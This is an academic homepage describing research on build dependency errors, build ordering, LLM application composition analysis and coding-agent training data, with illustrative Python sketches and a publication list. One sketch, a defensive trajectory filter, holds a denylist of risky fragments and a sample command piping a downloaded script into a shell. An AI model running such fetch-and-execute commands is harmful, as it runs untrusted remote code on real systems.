Software Engineering · Software Security · AI4SE · LLM Agents

Intelligent Software Engineering
for Real Development Workflows

My research focuses on observability, correctness, efficiency, and trustworthy data engineering in build systems, continuous integration, security analysis, and agent-assisted software development. I work on build dependency errors, incremental build reliability, automatic repair of missing dependencies, and LLM-assisted build environment generation, with the goal of bringing Coding Agents and software analysis techniques into real development workflows.

Build: Build ordering, build dependency error detection, and missing dependency repair
AI4SE: LLM-assisted software engineering, Agentic Coding, and code intelligence
LLM SCA: Software composition analysis, LLM application risk paths, and vulnerability reachability
Research Agenda

From “generating code” to “participating in software engineering”

Intelligence in software engineering is not merely about calling large language models. It requires integrating models, tools, context, execution environments, and quality validation into real development workflows.

Build Dependency Errors and Incremental Build Reliability: I study detection, explanation, and repair methods for incomplete dependency declarations, mismatches between build execution and declarations, and error propagation caused by configuration switches in incremental builds.
Build Ordering and Build Efficiency: For multi-configuration incremental builds, I characterize reuse boundaries and ordering sensitivity across configurations and explore ordering strategies that improve efficiency under correctness constraints.
Build Environment Generation and Reproducible Builds: For Docker, Make, and C/C++ projects, I explore automated build environment generation, artifact consistency validation, and software supply-chain risk control.
Trustworthy Software
R&D Efficiency and Agentic Engineering
Using real repositories, real toolchains, and real industrial processes as research objects, I study integrated methods that connect data, models, tools, and validation.
LLM Application Architecture and SCA: I identify LLM call sites, capability paths, external components, and vulnerability propagation relations to enable software composition analysis for LLM applications.
Agentic Coding Data Engineering: I construct high-quality task libraries, trajectory libraries, validation rules, and automated judging sandboxes to support enterprise Coding Agent training and evaluation.
LLM-Assisted Software Analysis: For bug localization, vulnerability detection, code repair, and build diagnosis, I explore knowledge enhancement, context organization, and trustworthy validation.
Build Dependency Research

Build Dependency Errors: From Incremental Build Reliability to Automated Repair

This is my longest-running research thread: starting from why incremental builds go wrong, I study how to detect, explain, and repair such errors, and how to generate reliable build environments.

Core Problem: Build systems do more than “run commands”

Modern build systems rely on scripts, declarative files, toolchains, system environments, and historical build states. When dependency declarations are missing, build execution diverges from declarations, configuration-switching orders are inappropriate, or environmental dependencies are incomplete, incremental builds may produce stale artifacts, incorrect binaries, or non-reproducible results. Therefore, build research is not only about acceleration; it also involves correctness boundaries, dependency evidence, error localization, and automated repair.

ISSTA'24 Incremental build dependency error detection
TSE'25 Dynamic execution–declaration consistency analysis
ASE'25 Automatic repair of missing dependency errors
01

Multi-configuration incremental build ordering

I study build reuse relations and ordering sensitivity across configurations, and explore how to schedule configuration builds to reduce redundant work while preserving correctness.
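
To make the ordering problem concrete, here is a minimal sketch under a deliberately simplified assumption: the cost of switching between two configurations is approximated by the number of options that differ. The cost model, the `greedy_order` helper, and the option names are all hypothetical illustrations, not the method from the FSE 2024 paper.

```python
from typing import Dict, FrozenSet, List


def switch_cost(a: FrozenSet[str], b: FrozenSet[str]) -> int:
    """Hypothetical cost model: number of options that differ between two configurations."""
    return len(a ^ b)


def greedy_order(configs: Dict[str, FrozenSet[str]], start: str) -> List[str]:
    """Nearest-neighbor heuristic: always build the configuration closest to the last one."""
    order = [start]
    remaining = set(configs) - {start}
    while remaining:
        current = configs[order[-1]]
        # Iterate in sorted order so ties are broken deterministically by name.
        nxt = min(sorted(remaining), key=lambda name: switch_cost(current, configs[name]))
        order.append(nxt)
        remaining.remove(nxt)
    return order


def total_cost(configs: Dict[str, FrozenSet[str]], order: List[str]) -> int:
    """Sum of switch costs along a build order."""
    return sum(switch_cost(configs[a], configs[b]) for a, b in zip(order, order[1:]))


# Hypothetical configurations, each described by its set of enabled options.
configs = {
    "base": frozenset(),
    "ssl": frozenset({"SSL"}),
    "ssl_zlib": frozenset({"SSL", "ZLIB"}),
    "debug": frozenset({"DEBUG"}),
}

order = greedy_order(configs, "base")
naive = ["ssl_zlib", "debug", "ssl", "base"]
print(order, total_cost(configs, order), total_cost(configs, naive))
```

A real study would replace `switch_cost` with measured rebuild work, since two configurations that differ in one option can still invalidate very different portions of the build.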

02

Incremental build dependency error detection

For hidden missing dependencies in incremental builds, I identify which file, command, or artifact relations are not correctly modeled by the build system.

03

Consistency Analysis between Build Execution and Dependency Declarations

By dynamically analyzing build execution behavior and comparing it with build declarations, I detect incomplete declarations, over-declarations, and execution-declaration dependency deviations.
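
The comparison described above can be sketched as a set difference per build target. This is a minimal illustration that assumes two maps are already available: `declared` (parsed from the build script) and `observed` (for instance, collected by a file-access tracer during the build). Both maps, the file names, and the `compare_dependencies` helper are hypothetical.

```python
from typing import Dict, Set

DepMap = Dict[str, Set[str]]


def compare_dependencies(declared: DepMap, observed: DepMap) -> Dict[str, Dict[str, Set[str]]]:
    """Report, per target, dependencies that are missing from or excess in the declarations."""
    report: Dict[str, Dict[str, Set[str]]] = {}
    for target in sorted(set(declared) | set(observed)):
        d = declared.get(target, set())
        o = observed.get(target, set())
        missing = o - d  # read during the build but never declared
        excess = d - o   # declared but never read during the build
        if missing or excess:
            report[target] = {"missing": missing, "excess": excess}
    return report


# Hypothetical example: main.o silently reads config.h; util.o over-declares legacy.h.
declared = {"main.o": {"main.c"}, "util.o": {"util.c", "legacy.h"}}
observed = {"main.o": {"main.c", "config.h"}, "util.o": {"util.c"}}

report = compare_dependencies(declared, observed)
for target, diff in report.items():
    print(target, diff)
```

A missing entry is the dangerous case for incremental builds: editing `config.h` would not trigger a rebuild of `main.o`, leaving a stale artifact. An excess entry only causes unnecessary rebuilds.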

04

Automatic repair of missing dependency errors

I move from detection to repair by combining error logs, project structure, package-management knowledge, and validation feedback to generate deployable dependency repair solutions.

05

LLM-Assisted Build Environment Generation

For Dockerfile generation and build environment reproduction, I combine build knowledge, repository context, and execution validation to improve automation in environment configuration.

Projects & Methodology

Major Research Projects and Technical Roadmap

My research starts from real software repositories and engineering workflows, with automated observation, verifiable experiments, and tool prototypes as core deliverables.

Build Dependency Error Detection and Repair

I study missing dependencies in incremental builds, inconsistencies between build execution and declarations, and missing system/library dependencies, forming a continuous research chain from detection and explanation to automated repair.

Incremental Build · Dependency Error · Dynamic Analysis · Auto Repair

Systematic Build Acceleration

I analyze build time at three levels (multi-configuration builds, single builds, and critical paths), characterizing rebuild closures, waiting losses, long-chain phases, and attainable upper bounds on acceleration.

Build DAG · Critical Path · Reuse Boundary · Ninja / Make
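
As a small illustration of the critical-path view, the sketch below computes the longest duration-weighted path through a build DAG, which bounds the build time achievable with unlimited parallelism. The task names and durations are hypothetical, and the code assumes every task has a known duration; it uses only the standard-library `graphlib` module (Python 3.9+).

```python
from graphlib import TopologicalSorter
from typing import Dict, List, Set, Tuple


def critical_path(deps: Dict[str, Set[str]], duration: Dict[str, float]) -> Tuple[float, List[str]]:
    """Return (length, path) of the longest duration-weighted path in a build DAG.

    `deps` maps each task to the set of tasks it depends on.
    """
    finish: Dict[str, float] = {}
    prev: Dict[str, str] = {}
    for node in TopologicalSorter(deps).static_order():
        # The latest-finishing prerequisite determines when this task can start.
        best = max(deps.get(node, ()), key=lambda p: finish[p], default=None)
        start = finish[best] if best is not None else 0.0
        finish[node] = start + duration[node]
        if best is not None:
            prev[node] = best
    end = max(finish, key=lambda n: finish[n])
    path = [end]
    while path[-1] in prev:
        path.append(prev[path[-1]])
    return finish[end], path[::-1]


# Hypothetical build: header generation, two compilations, one link step.
deps = {"a.o": {"gen_headers"}, "b.o": {"gen_headers"}, "link": {"a.o", "b.o"}}
duration = {"gen_headers": 2.0, "a.o": 5.0, "b.o": 1.0, "link": 3.0}

length, path = critical_path(deps, duration)
serial_time = sum(duration.values())
print(length, path, serial_time / length)
```

The ratio of serial time to critical-path length gives an upper bound on the speedup from parallelism alone; going beyond it requires shortening the chain itself.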

Software Composition Analysis for LLM Applications

Through call chains and capability paths, I identify real dependency components in LLM applications and analyze the gaps among declared dependencies, actual usage, configuration-mediated usage, and vulnerability reachability.

SCA · Capability Path · Vulnerability · Architecture Mining
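
The gap between declared dependencies and actual usage can be illustrated with a simplified sketch that extracts top-level imports from Python source and compares them with a declared package set. It assumes that package names equal import names, and it ignores standard-library modules, dynamic imports, and configuration-mediated usage, all of which a real analysis would have to handle. The package names are hypothetical.

```python
import ast
from typing import Dict, Set


def imported_top_level_modules(source: str) -> Set[str]:
    """Collect the top-level module names imported by a piece of Python source."""
    modules: Set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            # level == 0 excludes relative imports, which refer to the project itself.
            modules.add(node.module.split(".")[0])
    return modules


def dependency_gaps(declared: Set[str], source: str) -> Dict[str, Set[str]]:
    """Compare declared packages with the modules the source actually imports."""
    used = imported_top_level_modules(source)
    return {"declared_unused": declared - used, "used_undeclared": used - declared}


# Hypothetical application source and declared dependency set.
source = "import llm_client\nfrom vector_store.retrievers import TopK\n"
declared = {"llm_client", "yaml_loader"}

gaps = dependency_gaps(declared, source)
print(gaps)
```

Only components that are actually reachable from the code matter for vulnerability reachability, which is why the `used_undeclared` and `declared_unused` sets are both informative.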

High-Quality Training Data Construction for Agentic Coding

This project focuses on real tasks such as environment configuration, dependency repair, and build failure diagnosis. It records process behaviors including task planning, command execution, tool invocation, error recovery, rollback, and retry, and safeguards data quality through automated solvability checks, build/test validation, and risk filtering.

Task Library · Trajectory Library · Sandbox · Quality Report
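
A rough sketch of what a trajectory record and a quality gate could look like is given below. The `Trajectory` schema, the `passes_quality_gate` function, and the denylist are hypothetical simplifications; a single `final_build_passed` flag stands in for the build/test validation described above.

```python
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class Step:
    command: str
    exit_code: int


@dataclass
class Trajectory:
    task_id: str
    steps: List[Step] = field(default_factory=list)
    final_build_passed: bool = False


# Hypothetical denylist of command fragments treated as risky.
RISKY_TOKENS: Tuple[str, ...] = ("| sh", "chmod 777")


def passes_quality_gate(t: Trajectory) -> bool:
    """Keep a trajectory only if it is non-empty, ends in a passing build, and has no risky command."""
    if not t.steps or not t.final_build_passed:
        return False
    return not any(token in step.command for step in t.steps for token in RISKY_TOKENS)


# A failed step followed by a successful retry is kept: error recovery is valuable signal.
good = Trajectory("t1", [Step("make", 2), Step("apt-get install -y libssl-dev", 0), Step("make", 0)], True)
unsolved = Trajectory("t2", [Step("make", 2)], False)
risky = Trajectory("t3", [Step("curl http://example.invalid/install.sh | sh", 0)], True)

kept = [t.task_id for t in (good, unsolved, risky) if passes_quality_gate(t)]
print(kept)
```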

LLM-Assisted Software Security and Quality Assurance

By combining static analysis, dynamic execution evidence, vulnerability knowledge, and LLM reasoning, I study vulnerability detection, malicious injection variant detection, bug localization, and code repair.

Software Security · Vulnerability Detection · Bug Localization · LLM Prompting
How I Work

Research Methodology: From Engineering Phenomena to Verifiable Tools

2

Multi-Source Evidence Extraction

I integrate code, configuration, dependency declarations, build logs, test results, tool invocation traces, and repository history into traceable evidence chains.

3

Automated Analysis and Generation

I combine program analysis, rule systems, knowledge graphs, and LLMs to support localization, diagnosis, repair, scheduling, and data generation.

4

Experimental Validation and Scenario Feedback

I evaluate correctness, stability, efficiency, and deployability through benchmarks, sandboxes, real-repository reproduction, and industrial scenario trials.

Typical Deliverables

Rather than stopping at conceptual contributions, I emphasize engineering-verifiable outcomes: data specifications, task libraries, trajectory libraries, validation tools, prototype systems, experimental reports, and industrial scenario validation.

01 Data Specification
02 Task Library
03 Trajectory Library
04 Validation Tools
05 Quality Report
Selected Publications


First-author papers. Main thread: build systems, build dependency errors, and build environment generation
PACMSE
FSE 2024

Towards Efficient Build Ordering for Incremental Builds with Multiple Configurations [First Author]

Lyu J, Li S, Zhang H, et al.

This work studies ordering sensitivity and reuse opportunities in multi-configuration incremental builds, and explores ordering methods for improving build efficiency in multi-configuration settings.

Proceedings of the ACM on Software Engineering, 2024, 1(FSE): 1494–1517.
ISSTA
2024

Detecting Build Dependency Errors in Incremental Builds [First Author]

Lyu J, Li S, Zhang H, et al.

This work targets errors caused by missing or incomplete dependency declarations in incremental builds, and proposes automated detection methods for uncovering hidden build dependency problems.

Proceedings of the 33rd ACM SIGSOFT International Symposium on Software Testing and Analysis, 2024: 1–12.
TSE
2025

Detecting Build Dependency Errors by Dynamic Analysis of Build Execution against Declaration [First Author]

Lyu J, Li S, Liu B, et al.

This work dynamically analyzes build execution behavior and compares it against dependency declarations to identify inconsistencies between execution dependencies and declared dependencies.

IEEE Transactions on Software Engineering, 2025.
ASE
2025

Automatic Fixing of Missing Dependency Errors [First Author]

Lyu J, Zhang H, Yang L, et al.

This work advances from dependency error detection to automated repair by combining error evidence, dependency knowledge, and validation feedback to generate deployable fixes.

2025 40th IEEE/ACM International Conference on Automated Software Engineering, IEEE, 2025: 597–609.
ICSE
2026

Automatic Dockerfile Generation with Large Language Models [First Author]

Lyu J, Zhang H, et al.

This work studies LLM-based Dockerfile generation and software build automation, focusing on generation and validation from repository context to executable build environments.

Proceedings of the 48th IEEE/ACM International Conference on Software Engineering, 2026.
Selected co-authored papers. Topics: software R&D efficiency, code review, blockchain software engineering, AI4SE, and software security
ASE
2024

An Explainable Automated Model for Measuring Software Engineer Contribution

Li Y, Zhang H, Jin Y, Ren Z, Dong L, Lyu J, et al.

This work studies explainable automated models for measuring software engineer contribution, supporting R&D efficiency assessment and engineering management decisions.

Proceedings of the 39th IEEE/ACM International Conference on Automated Software Engineering, 2024: 783–794.
ASE
2024

GPP: A Graph-Powered Prioritizer for Code Review Requests

Yang L, Xu J, Zhang H, Wu F, Lyu J, et al.

This work uses graph-based modeling to prioritize code review requests, improving review resource allocation and engineering collaboration efficiency.

Proceedings of the 39th IEEE/ACM International Conference on Automated Software Engineering, 2024: 104–116.
TSE
2025

Decision Support for Selecting Blockchain-Based Application Design Patterns with Layered Taxonomy and Quality Attributes

Wang Y, Huang Y, Li J, Li S, Zhang H, Lyu J, et al.

This work constructs a layered taxonomy and quality-attribute-driven decision support method for selecting blockchain-based application design patterns.

IEEE Transactions on Software Engineering, 2025, 51(4): 1039–1066.
PACMSE
FSE 2025

A Knowledge Enhanced Large Language Model for Bug Localization

Li Y, Liu B, Zhang T, Wang Z, Lo D, Yang L, Lyu J, et al.

This work explores context organization, knowledge injection, and localization effectiveness of knowledge-enhanced LLMs for bug localization.

Proceedings of the ACM on Software Engineering, 2025, 2(FSE): 1914–1936.
TOSEM
2024

One Size Does Not Fit All: Investigating Efficacy of Perplexity in Detecting LLM-Generated Code

Xu J, Zhang H, Yang Y, Yang L, Cheng Z, Lyu J, et al.

This work analyzes the applicability boundaries of perplexity for detecting LLM-generated code and reveals the limitations of one-size-fits-all detection strategies across different scenarios.

ACM Transactions on Software Engineering and Methodology, 2024.
TSE
2026

Towards Robust Detection for Malicious Injection Variants

Yang Y, Liu B, Zhang H, Xu J, Zhou X, Lyu J, et al.

This work studies robust software security detection methods and generalization capability for malicious injection variants.

IEEE Transactions on Software Engineering, 2026 [to appear].
Students & Collaboration

Students Interested in Real Software Engineering Problems Are Welcome

I especially welcome students who have engineering implementation skills, are willing to dive into real toolchains and open-source repositories, and are interested in software security, testing, or AI4SE.

Potential Topics

Software build, software supply-chain security, program analysis, LLM agents, code intelligence, automated testing, and vulnerability detection.

Expected Skills

Ability to read and modify real codebases, familiarity with at least one of Python/Java/C, and willingness to conduct experiments, reproduction studies, and tool development.

Mentoring Style

Starting from students’ interests and small concrete problems, we gradually develop reproducible experiments, tool prototypes, paper submissions, or industrial collaboration deliverables, with weekly one-on-one meetings.

Contact

Open to Collaboration

Please feel free to reach out if you are interested in software R&D efficiency, build systems, software security, AI4SE, Agentic Coding, or the deployment of enterprise-level development tools.

Email: junlyu@nju.edu.cn Nanjing University